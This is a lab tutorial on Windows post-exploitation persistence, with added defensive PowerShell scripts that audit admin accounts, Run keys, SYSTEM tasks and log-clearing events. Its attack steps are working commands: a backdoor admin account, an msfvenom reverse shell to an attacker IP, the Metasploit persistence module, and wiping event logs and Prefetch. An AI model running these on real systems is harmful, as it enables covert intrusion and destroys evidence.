Maintaining Access in Privilege Escalation

Last Updated : 26 Aug, 2025

Privilege Escalation allows an attacker to gain SYSTEM (Windows) or root (Linux) access. But a one-time shell isn’t enough: if the system reboots, the session drops, or defenders kick you out, you lose control. Maintaining Access adds persistence so the exploit never has to be repeated. Maintaining Access ensures you can:

  • Re-enter the system without repeating exploitation.
  • Stay hidden while persisting in the background.
  • Cover your tracks to avoid detection.

In this lab, we’ll use Metasploit, Meterpreter, and manual techniques to add persistence and cover our tracks.

Learning Outcome

  • Adding users & backdoors for persistence.
  • Using Metasploit persistence module.
  • Proving re-entry after reboot (maintaining access).
  • Covering tracks to remain hidden.

Adding Users for Persistence

Create an additional local administrator account that can be used to log back in. (It is not hidden in any real sense: it shows up in net user and in the Administrators group, which is exactly what a defender's audit looks for.)

net user backdoor Pass@123 /add
net localgroup administrators backdoor /add

You can verify it with:

net user backdoor

Registry Keys for Persistence

This launches the payload automatically at startup, more precisely at the next logon of the user whose HKCU hive holds the key.

  • To make a registry key that will automatically run backdoor.exe on startup enter this in the shell:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\backdoor.exe"

After a reboot and logon of that user, backdoor.exe auto-runs.

Persistence using msfvenom

  • First make the payload in Kali using:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 -f exe > backdoor.exe
  • Upload this file using Meterpreter (background the session with Ctrl+Z instead of exiting it, so it stays available):
upload backdoor.exe C:\\backdoor.exe
  • Make a scheduled task from the Windows shell:
schtasks /create /tn "Updater" /tr "C:\backdoor.exe" /sc onlogon /ru SYSTEM
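The three persistence locations used so far (a new member of Administrators, a value under the Run key, and a scheduled task running as SYSTEM) are all enumerable from the host, and a defender's baseline check catches each of them. The following audit script is an added example, not part of the original article and not Metasploit's or Windows' own tooling. It assumes Windows 10 / Server 2016 or later (for Get-LocalGroupMember and Get-ScheduledTask; on the Windows 7 target used in this lab, net localgroup administrators and schtasks /query /fo LIST /v expose the same data), an elevated prompt, and baseline lists ($ExpectedAdmins, $TrustedPathRegex) that are assumptions to be filled in per environment. The names backdoor, updater and Updater it would flag are the ones used above.

```powershell
# Added example (not from the original article): audit of the persistence
# locations used above. Assumes Windows 10 / Server 2016+ and an elevated prompt.

# Baselines are assumptions: derive them from a known-good build of the host.
$ExpectedAdmins = @('Administrator')
# Paths from which autostart entries are normally expected to run.
$TrustedPathRegex = '^"?(%(windir|SystemRoot|ProgramFiles)%|[A-Za-z]:\\(Windows|Program Files))'

function Find-SuspiciousAdmins {
    # "net localgroup administrators backdoor /add" shows up here as an unexpected member.
    Get-LocalGroupMember -Group 'Administrators' | ForEach-Object {
        $short = $_.Name.Split('\')[-1]          # Name is COMPUTER\user or DOMAIN\user
        if ($ExpectedAdmins -notcontains $short) {
            [pscustomobject]@{ Type = 'LocalAdmin'; Name = $_.Name; Detail = "source=$($_.PrincipalSource)" }
        }
    }
}

function Find-SuspiciousRunKeys {
    # HKCU: per-user logon (the key the article writes); HKLM: every logon on the machine.
    $keys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath metadata properties
            $cmd = [string]$p.Value
            if ($cmd -notmatch $TrustedPathRegex) {
                [pscustomobject]@{ Type = 'RunKey'; Name = "$key\$($p.Name)"; Detail = $cmd }
            }
        }
    }
}

function Find-SuspiciousSystemTasks {
    # Tasks that run as SYSTEM from outside the trusted paths, which is what
    # schtasks /tr "C:\backdoor.exe" /ru SYSTEM creates. The trigger class names
    # (e.g. MSFT_TaskLogonTrigger) are reported so the reviewer sees when it fires.
    Get-ScheduledTask |
        Where-Object { $_.Principal.UserId -in 'SYSTEM', 'S-1-5-18', 'NT AUTHORITY\SYSTEM' } |
        ForEach-Object {
            $task = $_
            foreach ($a in $task.Actions) {
                if ($a.Execute -and $a.Execute -notmatch $TrustedPathRegex) {
                    $trig = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName }) -join ','
                    [pscustomobject]@{
                        Type   = 'SchTask'
                        Name   = "$($task.TaskPath)$($task.TaskName)"
                        Detail = "$($a.Execute) [$trig]"
                    }
                }
            }
        }
}

$findings = @(Find-SuspiciousAdmins) + @(Find-SuspiciousRunKeys) + @(Find-SuspiciousSystemTasks)
if ($findings.Count -eq 0) { 'No unexpected persistence entries found.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

The path heuristic is deliberately simple: it does not prove an entry is malicious, it only separates autostart entries from the locations where legitimate software normally installs, so that the short list left over can be reviewed by hand. Running it against a clean snapshot first and recording the output gives the baseline that later runs are compared to.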

Reverse Shell Persistence using Metasploit

This creates a new reverse shell session every time the computer is rebooted. From msfconsole, with the Meterpreter session backgrounded, use this module:

use exploit/windows/local/persistence
set SESSION 1
set LHOST 192.168.56.102
set LPORT 4444
set STARTUP SYSTEM
set PAYLOAD windows/meterpreter/reverse_tcp
exploit # Before exploiting start the listener on another terminal
  • Set up a handler on another Kali terminal:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 4444
run
  • Reboot Windows 7.
  • After reboot, the victim should automatically reconnect to your handler, giving you a new Meterpreter session.

Covering Tracks

Once persistence is achieved, the attacker’s next step is to hide their presence. Covering tracks matters because defenders investigate event logs, user history, and suspicious files to detect a compromise.

  • Clear Event Logs: Attackers often remove these to prevent defenders from tracing activities.
wevtutil cl Security
wevtutil cl Application
wevtutil cl System
  • Or clear the event logs from Meterpreter:
clearev     # This clears all event logs directly from a Meterpreter session.
  • Clear user history: Windows stores cached and recently executed files which can reveal attacker activity.
del C:\Windows\Prefetch\*.*                   # Delete Prefetch Files

Other useful deletions

del %temp%\*.* /s /q              :: Clear temporary files
del C:\Users\<User>\Recent\*.* /q :: Clear recently opened files
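Clearing a log is itself a logged action: wevtutil cl Security and Meterpreter's clearev leave Security event ID 1102 ("The audit log was cleared"), and clearing the System or Application log leaves event ID 104 in the System log, both written after the wipe so they survive it. An emptied Prefetch folder on a host where prefetching is enabled is a similarly loud artifact. The script below is an added example, not part of the original article; it assumes an elevated prompt (the Security log is readable only by administrators), a seven-day look-back window, and a Prefetch file-count threshold of 10, all of which are assumptions to tune.

```powershell
# Added example (not from the original article): detect the track-covering
# steps described above. Run from an elevated PowerShell prompt.

$LookBackDays = 7            # assumption: adjust to the investigation window
$PrefetchMinFiles = 10       # assumption: a used host normally has far more .pf files

function Get-LogClearEvents {
    param([datetime]$StartTime = (Get-Date).AddDays(-$LookBackDays))
    $events = @()
    # wevtutil cl Security / clearev  -> Security 1102 (records the clearing account)
    $sec = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102; StartTime = $StartTime } -ErrorAction SilentlyContinue
    if ($sec) { $events += $sec }
    # wevtutil cl System / Application -> System 104 (message names the log that was cleared)
    $sys = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 104; StartTime = $StartTime } -ErrorAction SilentlyContinue
    if ($sys) { $events += $sys }
    $events | Select-Object TimeCreated, Id, LogName,
        @{ Name = 'Message'; Expression = { ($_.Message -replace '\s+', ' ').Trim() } }
}

function Test-PrefetchIntact {
    # Prefetch is only meaningful when the prefetcher is on (EnablePrefetcher != 0);
    # an almost empty folder on such a host points at "del C:\Windows\Prefetch\*.*".
    $pfDir = Join-Path $env:SystemRoot 'Prefetch'
    $pfKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters'
    $enabled = (Get-ItemProperty -Path $pfKey -ErrorAction SilentlyContinue).EnablePrefetcher
    $count = (Get-ChildItem -Path $pfDir -Filter '*.pf' -ErrorAction SilentlyContinue | Measure-Object).Count
    [pscustomobject]@{
        PrefetchEnabled   = $enabled
        PrefetchFileCount = $count
        Suspicious        = ($enabled -ne $null -and $enabled -ne 0 -and $count -lt $PrefetchMinFiles)
    }
}

'--- Log-clear events ---'
$clears = Get-LogClearEvents
if ($clears) { $clears | Format-Table -AutoSize -Wrap } else { 'No log-clear events in the window.' }
'--- Prefetch state ---'
Test-PrefetchIntact | Format-List
```

Because the 1102/104 records are what the log-clearing leaves behind, the useful follow-up is to forward them off the host (Windows Event Forwarding or a SIEM agent), where a later clear cannot reach them; the same forwarding turns the deletion of Prefetch, %temp% and Recent items from something discovered on the host into something noticed at the time it happened.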